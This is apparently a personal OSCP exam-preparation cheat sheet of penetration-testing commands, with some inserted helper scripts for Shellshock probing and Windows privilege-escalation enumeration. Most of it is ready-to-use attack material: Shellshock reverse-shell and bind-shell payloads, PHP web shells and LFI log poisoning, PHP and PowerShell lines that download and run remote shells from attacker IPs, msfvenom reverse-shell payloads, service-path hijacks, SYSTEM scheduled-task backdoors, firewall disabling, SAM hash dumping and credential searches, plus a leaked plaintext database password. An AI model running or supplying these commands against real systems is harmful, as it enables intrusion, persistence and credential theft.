OSCP Notes

This file contains all the notes I made during my preparation for the OSCP exam.
=================

START FTPD: /etc/init.d/vsftpd start

make dirtycow stable
echo 0 > /proc/sys/vm/dirty_writeback_centisecs

SHELLSHOCK
==========

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.11.0.112/443 0>&1 " http://10.11.1.71:80/cgi-bin/admin.cgi

nmap 10.11.1.71 -p 80 \
--script=http-shellshock \
--script-args uri=/cgi-bin/admin.cgi
(change uri= to test other CGIs, e.g. /cgi-bin/test.cgi)

./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

* Shellshock via SSH (works when the key is restricted with a ForceCommand / command= option: the payload is passed through SSH_ORIGINAL_COMMAND)
ssh -vvv
ssh -i noob noob@$ip '() { :;}; /bin/bash'

* cat file (view file contents)

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
(the function definition needs the space after the brace: "() { :;}"; "\$" keeps the $(...) from being expanded by the local shell)

curl -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.178.102/9999 0>&1" "http://192.168.178.121:80/cgi-bin/status/"

* Shellshock run bind shell using netcat

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost:vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
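Added example (not from the original notes): a small POSIX shell script that first checks whether the local bash still has the function-import bug the probes above exploit, then builds the raw CGI request that the "| nc TARGET 80" one-liners send. It uses GET and prefixes the command with a Content-Type header plus blank line (the form shocker.py uses) so the command output comes back as the response body instead of being rejected as a malformed header. CGI path, Host header and command are placeholders given on the command line.

```shell
#!/bin/sh
# Added example, not part of the original notes. Two helpers around the
# Shellshock probes above:
#   local_bash_vulnerable  - does the bash in PATH execute code appended to an
#                            exported function definition (CVE-2014-6271)?
#   build_probe_request    - print the raw HTTP request the "| nc TARGET 80"
#                            one-liners send, with the payload in User-Agent.

# Exit 0 if bash ran the trailing "echo SHOCKED" while importing the function
# from the environment, 1 if it is patched, 2 if no bash is installed.
local_bash_vulnerable() {
    command -v bash >/dev/null 2>&1 || return 2
    out=$(env x='() { :;}; echo SHOCKED' bash -c ':' 2>/dev/null)
    case "$out" in
        *SHOCKED*) return 0 ;;
        *)         return 1 ;;
    esac
}

# $1: CGI path, $2: Host header value, $3: command to run on the target.
# "echo Content-Type: text/plain; echo;" terminates the CGI header block, so the
# web server returns the command output as the response body instead of
# rejecting it as a malformed header.
build_probe_request() {
    path=$1; host=$2; cmd=$3
    printf 'GET %s HTTP/1.1\r\n' "$path"
    printf 'User-Agent: () { :;}; echo Content-Type: text/plain; echo; %s\r\n' "$cmd"
    printf 'Host: %s\r\n' "$host"
    printf 'Connection: close\r\n\r\n'
}

# Usage:  sh shellshock.sh check
#         sh shellshock.sh probe /cgi-bin/status vulnerable '/bin/cat /etc/passwd' | nc TARGET 80
case "${1:-}" in
    check) if local_bash_vulnerable; then echo "bash: VULNERABLE"; else echo "bash: not vulnerable (rc=$?)"; fi ;;
    probe) build_probe_request "$2" "$3" "$4" ;;
esac
```

The local check is worth running on any box you land on: a vulnerable bash means every CGI, DHCP client hook and ForceCommand on that host is a code-execution path.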

FTP BOUNCE
==========
-> use an FTP bounce attack through the FTP server on host A (10.11.1.125A) to port-scan host B (10.11.1.125B)
nmap -vvvv -Pn -n -b 10.11.1.125A 10.11.1.125B -p-

Portscan Netcat
===============
nc -nvv -w 1 -z $ip 3388-3390

Temporary Web Server
===================
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888

WEB ENUMERATION
============
* URL Enumeration
gobuster -u http://10.11.1.71/ \
-w /usr/share/seclists/Discovery/Web_Content/common.txt \
-s '200,204,301,302,307,403,500' -e
(gobuster 3.x moved these options under the dir subcommand: gobuster dir -u ... -w ...)

-s string
Positive status codes (dir mode only) (default "200,204,301,302,307")
if every non-existing URL returns 200 (a catch-all "Try again you N000b" page),
remove 200 from -s

-x for file extensions
-x asp

gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,301,302,307,403,500' -e

uniscan -qweds -u http://vm/

REVERSE SHELL
=============
* Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; bash -i >& /dev/tcp/10.11.0.192/443 0>&1; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'

METASPLOIT
==========
* start up postgresql
systemctl start postgresql
* start up msfdb
msfdb start
* start up msf
msfconsole -q
msf > db_status
[*] postgresql connected to msf
msf >

searchsploit drupal
searchsploit -x filepath

copy to clipboard the exploit:
searchsploit -p filepath

meterpreter reverse shell
set payload windows/meterpreter/reverse_tcp

PHP Exploitation through LFI
============================
* Check for LFI Linux:
https://www.exploit-db.com/exploits/25971
http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../..//var/log/httpd-error.log

http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Apache Log Poisoning through LFI
-> send a request whose User-Agent contains PHP (a system() call like the cmd.php one-liners below), then include the access or error log through the LFI; the injected PHP runs when the log is included.

john --show unshadow.txt

=> decodes to:
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "99bbVDdorGzfZJun";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
PHP Session Path
/var/tmp/sess_
/tmp/sess_

* Check for LFI Windows:
page=../../../../../../windows/system32/drivers/etc/hosts

cp /opt/powershell/nishang/Shells/Invoke-PowerShellTcp.ps1 shell-9001.ps1
append at the bottom of the file:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.0.192 -Port 4444
copy shell-9001.ps1 to the local web root
<?php system($_REQUEST['PleaseSubscribe']); ?>
<?php system($_REQUEST['cmd']); ?>
?PleaseSubscribe="PowerShell IEX(New-Object Net.WebClient).downloadString('http://10.10.0.192/shell-9001.ps1')"
-> IEX downloads and executes the script in memory
on a 64-bit Windows machine, when the web server runs as a 32-bit process, replace powershell with
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe

press CTRL-U in Burp to URL-encode the selected string

- upload a file containing this:
-> downloads the shell to /tmp/ and executes it
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/shell; chmod +x shell; ./shell"); ?>

=> download php-reverse-shell as rev.php and copy it to a directory from which rev.php can be executed via the LFI
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/c99.php; cp c99.php /usr/local/database/c99.php; "); ?>
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; cp rev.php /usr/local/database/rev.php; "); ?>
<?php system("cd /tmp; /usr/local/bin/wget http://10.11.0.192/rev.php; php /tmp/rev.php "); ?>
... the last form is useful when you cannot copy into the www-root
... and when the www-root path is only known through the LFI

=> fetch a remote file from http://10.11.0.192/shell.txt and write it next to the current script as myshell.php
<?php function dl($u, $o){$c = file_get_contents($u);file_put_contents($o,$c);}dl("http://10.11.0.192/shell.txt",realpath(realpath(dirname(__FILE__)))."/myshell.php")?>

Nice PHP one-liners

echo '<?php phpinfo(); ?>' > phpinfo.php

echo '<?php echo shell_exec($_GET["cmd"]); ?>' > cmd.php

Then you can easily pass whatever commands you like:

http://example.com/cmd.php?cmd=id

Windows Exploitation through ASP FILE UPLOAD
============================================

root@kali:~/pwk# msfvenom -l payloads | grep windows

* Creating ASP Reverse NetCat shell with msfvenom:

root@kali:~/pwk# msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.112 LPORT=4444 EXITFUNC=thread -f asp --arch x86 --platform win > revshell.asp
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of asp file: 38282 bytes

and catch it with

C:\Users\jacco>nc -lvp 4444
listening on [any] 4444 ...

* Creating ASP Reverse Meterpreter Shell with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp

* start meterpreter handler in msfconsole to catch ASP Reverse Meterpreter Shell

use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.112
LHOST => 10.11.0.112
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.112
set LPORT 4444
set ExitOnSession false
exploit -j

msf > sessions -i 1

Meterpreter Reverse Shellcode
=============================
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed LHOST=10.11.0.192 LPORT=4444 -f python > shell.py

Windows Privilege Escalation Cheat Sheet
========================================
* Determine Service Pack
Windows 7 / Server 2008 R2 (NT 6.1):
systeminfo
OS Version: 6.1.7600 N/A Build 7600
OS Version: 6.1.7601 Service Pack 1 Build 7601
Hotfix(s): N/A

Windows XP:
type C:\Windows\system32\eula.txt
type C:\Windows\System32\license.rtf

* Hotfixes installed
dir C:\Windows\SoftwareDistribution\Download\*.* /s
type C:\Windows\WindowsUpdate.log

* List all Documents of all Users
dir /b /ad "C:\Documents and Settings\" /s

* get current windows version
type C:\Windows\system32\eula.txt

* current priviledges
whoami /priv Privileges associated with your account
whoami Get current username

* Other logged in Users
qwinsta

* Users on the system
net user

* Groups on the system
net localgroup

* Members of a group
net localgroup "Remote Desktop Users"

* Change password for user Bob
net user Bob *

* Create a user
net user /add [username] [password]
net user /add gamma gamma

* Run cmd.exe as Administrator
runas /savecred /user:administrator cmd

* to Obtain the names of a service.
Syntax: sc query [service name]
Example: sc query wuauserv

sc query state= all

get all non-windows services:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
-> then check the permissions of the executables (and their directories) with icacls
-> vulnerable when writable by low-privileged principals, e.g. Everyone:(I)(F) or BUILTIN\Users:(I)(M)

* Running Tasks
tasklist

* Kill a task
taskkill /f /pid 7777
taskkill /f /im "Taskmgr.exe"

* start or stop a service
sc start <service name>
sc stop <service name>

* run command through smb when user/password is known
smbexec.py THINC/gamma:"mypassword"@10.11.118

* snmp configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

* UnQuoted Service Paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

* Permissions
icacls "C:\Example" Print permissions for "Example" directory
accesschk.exe -qwsu "Group" Objects modifiable by "Group" (try "Everyone", "Authenticated Users", and/or "Users")


* Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs “Authenticated Users” c:\
accesschk64.exe -uwdqs Users c:\*.*

* Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs “Authenticated Users” c:\*.*
accesschk64.exe -uwqs Users c:\*.*
accesschk64.exe -uwqs “Authenticated Users” c:\*.*

* Permissions to services
accesschk.exe -ucqv *
accesschk64.exe -ucqv *
accesschk.exe -cuwv "user" *

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
SERVICE_ALL_ACCESS means we have full control over modifying the properties of the PFNet service

Find a weak service:
C:\Users\Public\accesschk.exe -cuwv "user" *
Start Type is AUTO_START
sc config blackwinterSrv binpath= "C:\temp_dir\nc.exe -nv 192.168.168.168 443 -e C:\WINDOWS\System32\cmd.exe"

* To see all global objects that Everyone can modify:

accesschk -wuo everyone \basednamedobjects
accesschk64 -wuo everyone \basednamedobjects

* View the System event log (note: "wevtutil cl System" CLEARS the log, it does not display it)
wevtutil qe System /c:20 /rd:true /f:text

* XP: add user to the Administrators group
net localgroup Administrators Bob /add

* find scheduled tasks
schtasks /query /fo LIST /v
Scheduled Tasks
Here we are looking for tasks that are run by a privileged user and that run a binary we can overwrite.
schtasks /query /fo LIST /v
This might produce a huge amount of text. I have not been able to figure out how to just output the relevant strings with findstr. So if you know a better way please notify me. As for now I just copy-paste the text and paste it into my Linux terminal.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another privileged user.
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
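Added example (not part of the original notes): the grep -B 1 step above done properly. The script below reads pasted "schtasks /query /fo LIST /v" output and prints, per task that runs as the wanted account, the account, the task name and the command it runs, so each binary can then be checked with icacls. The LIST format prints one "Label:   value" line per field and separates tasks with a blank line; the sample output embedded below is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example, not part of the original notes. Filters the pasted output of
#   schtasks /query /fo LIST /v
# down to the tasks that run under a privileged account and shows what they
# execute. Only the TaskName, "Task To Run" and "Run As User" fields are used;
# tasks are separated by a blank line in LIST output.

# Read LIST output on stdin, print "user<TAB>task<TAB>command" for every task
# whose "Run As User" is $1 (default SYSTEM). "NT AUTHORITY\SYSTEM" and plain
# "SYSTEM" both match because a trailing match is accepted too. The account is
# passed through the environment, not awk -v, so backslashes stay intact.
privileged_tasks() {
    WANT="${1:-SYSTEM}" awk '
        BEGIN { want = ENVIRON["WANT"] }
        function emit(   u, w) {
            u = toupper(user); w = toupper(want)
            if (name != "" && (u == w || substr(u, length(u) - length(w) + 1) == w))
                printf "%s\t%s\t%s\n", user, name, cmd
            name = cmd = user = ""
        }
        { sub(/\r$/, "") }                                          # pasted CRLF
        /^TaskName:/    { sub(/^TaskName:[[:space:]]*/, "");    name = $0; next }
        /^Task To Run:/ { sub(/^Task To Run:[[:space:]]*/, ""); cmd  = $0; next }
        /^Run As User:/ { sub(/^Run As User:[[:space:]]*/, ""); user = $0; next }
        /^[[:space:]]*$/ { emit() }
        END              { emit() }
    '
}

# Constructed sample of three tasks (not captured from a real host): two run
# as SYSTEM, one as a normal user.
sample_schtasks_output() {
    cat <<'EOF'

Folder: \
HostName:                             WIN-HOST
TaskName:                             \Backup Job
Next Run Time:                        N/A
Status:                               Ready
Task To Run:                          C:\Scripts\backup.bat
Run As User:                          SYSTEM

HostName:                             WIN-HOST
TaskName:                             \Cleanup
Next Run Time:                        N/A
Status:                               Ready
Task To Run:                          "C:\Program Files\Cleaner\clean.exe" /all
Run As User:                          NT AUTHORITY\SYSTEM

HostName:                             WIN-HOST
TaskName:                             \UserSync
Next Run Time:                        N/A
Status:                               Ready
Task To Run:                          C:\Users\bob\sync.exe
Run As User:                          WIN-HOST\bob
EOF
}

# Usage on the attacking box after pasting the schtasks output into tasks.txt:
#   privileged_tasks SYSTEM < tasks.txt
# Then check each listed binary (and its directory) with icacls, as above.
```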

Task scheduled to run when RDP login fails:
SchTasks /Create /RU SYSTEM /SC ONEVENT /MO "*[System[EventID=4625]] and *[EventData[Data='USERNAME_BACKDOOR']]" /EC Security /TN "RDPBackdoor" /TR "C:\PAYLOAD.EXE" /F

schtasks /create /tn "SystemTask" /tr "cmd /C 'PAYLOAD.EXE'" /rl HIGHEST /ru SYSTEM /sc ONSTART
/tn specifies the name of the task
/tr specifies the command to run
/rl specifies run level. I don’t think this is related to Unix run levels, but is instead a privilege thing
/ru the user the payload is run under.
/sc is the frequency. we want it to run when the machine starts up.

* list all services
sc query

* As Admin, create a user that is allowed to use Rdesktop
net user /add gamma gamma
net localgroup “Remote Desktop Users” gamma /add
net localgroup Administrators gamma /add
net localgroup “Backup Operators” gamma /add

* Search for interesting files
dir sysprep.inf /s
dir sysprep.xml /s
dir Unattended.xml /s
dir *.zip /s
dir *.7z /s
findstr /si pass *.xml *.ini *.txt *.config *.cfg *.bat
findstr /si pwd *.xml *.ini *.txt *.config *.cfg *.bat
dir /s *pass* == *cred* == *vnc* == *.config*
dir C:\*vnc.ini /s /b /c
dir C:\ /s /b /c | findstr /sr \*password\*
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
findstr /si password *.xml *.ini *.txt *.config 2>nul

* Query registry
reg query HKLM /f password /t REG_SZ /s
reg query HKLM /f pass /t REG_SZ /s
reg query HKLM /f pwd /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

* Check the credential store for saved/cached passwords
cmdkey.exe /list
runas /profile /savecred /user:Administrator <full path of executeable>

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

* Check if InstallAlwaysElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.192 LPORT=4444 -f msi -o shell.msi
msfvenom -p windows/adduser USER=rottenadmin PASS=xxx -f msi -o rotten.msi
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi

vulnerable if both keys (HKCU and HKLM) give the following output:
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
A malicious .msi file can be created using msfvenom. Choose a desired payload and use the -f msi flag to set the output format to MSI.

Then the payload can be executed on the vulnerable system using msiexec.

* Check for Unattended install

dir C:\Windows\Panther\
dir C:\Windows\Panther\Unattend\
dir C:\Windows\System32\
dir C:\Windows\System32\sysprep\
dir c:\Unattended.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s

* DLL Hijacking

* PowerSploit

* Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

The path for PFNet's service binary is unquoted and contains spaces.

Metasploit Module: exploit/windows/local/trusted_service_path
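Added example (not from the original notes) for the two unquoted-service-path checks above (the wmic/findstr filter and the PFNet case): instead of eyeballing the wmic table, feed "wmic service get name,pathname /format:csv" to this script and it prints, for every unquoted path with spaces outside C:\Windows, the file names Windows tries before the real binary. A writable directory for any of them means a dropped executable runs as the service account. The service list embedded below is constructed for illustration, not captured from a real host.

```shell
#!/bin/sh
# Added example, not part of the original notes. Takes the service list from
#   wmic service get name,pathname /format:csv
# (CSV is easier to parse than the fixed-width table used in the notes) and
# prints, for every service whose binary path is unquoted and contains spaces,
# the file names Windows will try before the real one. Services under
# C:\Windows\ are skipped, as in the findstr filter above.

# Read wmic CSV (Node,Name,PathName) on stdin, print "service<TAB>candidate".
unquoted_service_paths() {
    awk -F, '
        # For "C:\Program Files\My App\svc.exe" Windows tries
        # "C:\Program.exe" and "C:\Program Files\My.exe" before the real file:
        # every prefix that ends at a space, with .exe appended.
        function emit_candidates(name, exe,   n, parts, prefix, i) {
            n = split(exe, parts, " ")
            prefix = parts[1]
            for (i = 2; i <= n; i++) {
                printf "%s\t%s.exe\n", name, prefix
                prefix = prefix " " parts[i]
            }
        }
        { sub(/\r$/, "") }
        NF < 3 || $1 == "Node" { next }                     # blank first line, header
        {
            name = $2
            path = $3
            for (i = 4; i <= NF; i++) path = path "," $i   # commas inside the path
            if (substr(path, 1, 1) == "\"") next            # already quoted: safe
            idx = index(tolower(path), ".exe")
            if (idx > 0) path = substr(path, 1, idx + 3)    # strip service arguments
            if (tolower(substr(path, 1, 11)) == "c:\\windows\\") next
            if (index(path, " ") == 0) next                 # no spaces: safe
            emit_candidates(name, path)
        }
    '
}

# Constructed sample (not captured from a real host): one quoted path, one
# under C:\Windows, two unquoted paths with spaces.
sample_wmic_csv() {
    cat <<'EOF'

Node,Name,PathName
WIN-HOST,PFNet,C:\Program Files\Privacyware\Privatefirewall 7.0\pfsvc.exe
WIN-HOST,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs
WIN-HOST,GoodSvc,"C:\Program Files\Good Vendor\good.exe" -service
WIN-HOST,VulnSvc,C:\Vuln Apps\My Svc\bin\svc.exe -k run
EOF
}

# Usage: save the wmic CSV output as services.csv on the attacking box, then
#   unquoted_service_paths < services.csv
# and check write access to each candidate's directory with icacls.
```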

* Unattended Installs

Well, That Escalated Quickly…


-> installations without user interactions containing credentials:

dir c:\Unattend.xml /s
dir c:\sysprep.xml /s
dir c:\sysprep.inf /s

* VNC Password location
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password

Cracking:
root@kali:~/scripts/bruteforce# ./vncpwd/vncpwd /root/vnc_pwd

TightVNC
C:\>reg query HKEY_LOCAL_MACHINE\Software\TightVNC\Server /v Password

HKEY_LOCAL_MACHINE\Software\TightVNC\Server
Password REG_BINARY 2151D3722874AD0C

HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_CURRENT_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/

* Basic Commands
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
echo %username%
net users
net user user1

* Windows Firewall
Show config: netsh firewall show config
allow port 3389: netsh firewall add portopening protocol=TCP name=3389 port=3389 mode=ENABLE
Turn off:
netsh firewall set opmode disable
netsh advfirewall set currentprofile state off

* Enable RDP
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start TermService
netsh firewall add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%SystemRoot%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%SystemRoot%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udp
(inside a .bat file write %%SystemRoot%% instead of %SystemRoot%)
OR (meterpreter)
run post/windows/manage/enable_rdp


* Enable RDP access

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

* Neighbours
ipconfig /displaydns Shows DNS cache
route print Print routing table

* WinXP dump hashes
reg.exe save HKLM\SAM sam
reg.exe save HKLM\SYSTEM sys
samdump2 sys sam

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

* view registry / ntuser.dat
fred

* upload files via ftp (the FTP server must allow anonymous access; ftp/ftp below are the anonymous user and password):
echo open 10.11.0.192 > ftp.txt
@echo ftp>> ftp.txt
@echo ftp>> ftp.txt
@echo binary>> ftp.txt
@echo GET /nc.exe>> ftp.txt
echo quit >>ftp.txt
ftp -s:ftp.txt -v

* Download from HTTP via Powershell one-liner
(New-Object System.Net.WebClient).DownloadFile("http://host/file","C:\LocalPath") PowerShell one-liner, download a remote file to LocalPath

Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename"
(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename")

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.192/MS11-040.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

* Run nc as another user via Process.Start (the password argument is the SecureString; the last argument is the domain, for a local account pass the computer name)
$secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("alice", $secpasswd)
$computer = "10.11.1.49"
[System.Diagnostics.Process]::Start("C:\Users\Public\nc","-e c:\windows\system32\cmd.exe 10.11.0.192 9999", $mycreds.Username, $mycreds.Password, $computer)

powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -File wget.ps1

* windows wget alternative (VBScript downloader written line by line with echo)
echo Set args = Wscript.Arguments >> webdl.vbs
timeout 1
echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
timeout 1
echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs
timeout 1
echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs
timeout 1
echo xHttp.Open "GET", Url, False >> webdl.vbs
timeout 1
echo xHttp.Send >> webdl.vbs
timeout 1
echo with bStrm >> webdl.vbs
timeout 1
echo .type = 1 ' >> webdl.vbs
timeout 1
echo .open >> webdl.vbs
timeout 1
echo .write xHttp.responseBody >> webdl.vbs
timeout 1
echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs
timeout 1
echo end with >> webdl.vbs

The file can then be run with:

cscript.exe webdl.vbs

* Transfer via SMB
python /usr/local/bin/smbserver.py ROPNOP /oscp/exploit/windows/ms11-046/
impacket-smbserver ROPNOP /oscp/exploit/windows/ms11-046/
copy \\10.11.0.192\ROPNOP\MS11-040.exe
\\10.11.0.192\ROPNOP\MS11-040.exe

* Transfer via Webdav
/root/webdav_start.sh
net use x: http://10.11.0.192/

* Transfer via Certutil
certutil.exe -URL http://10.11.0.192/foobar
foobar is in C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

* tunnel ports that are only reachable locally on the target (remote forward from the target back to the attacking box: port 6666 on the attacker reaches 445 on the target's loopback)
plink.exe -v -pw mypassword gamma@10.11.0.192 -R 6666:127.0.0.1:445

To reach a MySQL instance that only listens locally, build an SSH tunnel for port 3306: open an SSH connection to 1.2.3.4 and forward local port 6603 to port 3306 on the far end.

plink.exe -v -pw geheim nutzername@1.2.3.4 -L 6603:localhost:3306

* Compiling C windows exploits on Linux

wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add -
apt-get install mingw-w64 -y
note: you can add the 32-bit architecture with the following lines.
dpkg --add-architecture i386
apt-get update
you can check your architecture with the following commands:
dpkg --print-architecture
dpkg --print-foreign-architectures

#64 bit > x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
#32 bit > i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
root@kali# wine exploit.exe

* Windows LOOTING
https://tools.kali.org/password-attacks/creddump

* Run Powershell scripts
MS16-032 https://www.exploit-db.com/exploits/39719/

powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"

powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Bethany\AppData\Local\Temp\Invoke-MS16-032.ps1; Invoke-MS16-032 }"

* Windows compile python to .exe
net use z: \\tsclient\test

code in /root/rdesktopshare

C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1
C:\Users\Administrator\Desktop\Tools\python\pyinstaller-2.1\pyInstaller-2.1>c:\Python27\python.exe pyinstaller.py --onefile z:\ms14-058.py

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py

* Powershell RunAS

working:
echo $username = 'ftp' > runas.ps1
echo $securePassword = ConvertTo-SecureString "foobar23" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo $script = 'c:\windows\system32\cmd.exe' >> runas.ps1
echo Start-Process -WorkingDirectory 'C:\Windows\System32' -FilePath $script -Credential $credential >> runas.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File runas.ps1

* Powershell reverse Netcat shell in C:\Users\Public\nc.exe with user ftp/foobar23

echo $username = 'ftp' > rev.ps1
echo $securePassword = ConvertTo-SecureString "foobar23" -AsPlainText -Force >> rev.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> rev.ps1
echo $script= 'C:\Users\Public\nc.exe' >> rev.ps1
echo Start-Process -WorkingDirectory 'C:\Users\Public\' -FilePath $script -ArgumentList '-e cmd.exe 10.11.0.192 9999' -Credential $credential >> rev.ps1

echo $username = 'alice' > runas.ps1
echo $securePassword = ConvertTo-SecureString "aliceishere" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Windows\System32\cmd.exe -Credential $credential >> runas.ps1

Using Powershell to RunAs an administrative user:
echo $secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force > run.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential ("admin", $secpasswd) >> run.ps1
echo $computer = "DANCING-PARROT" >> run.ps1
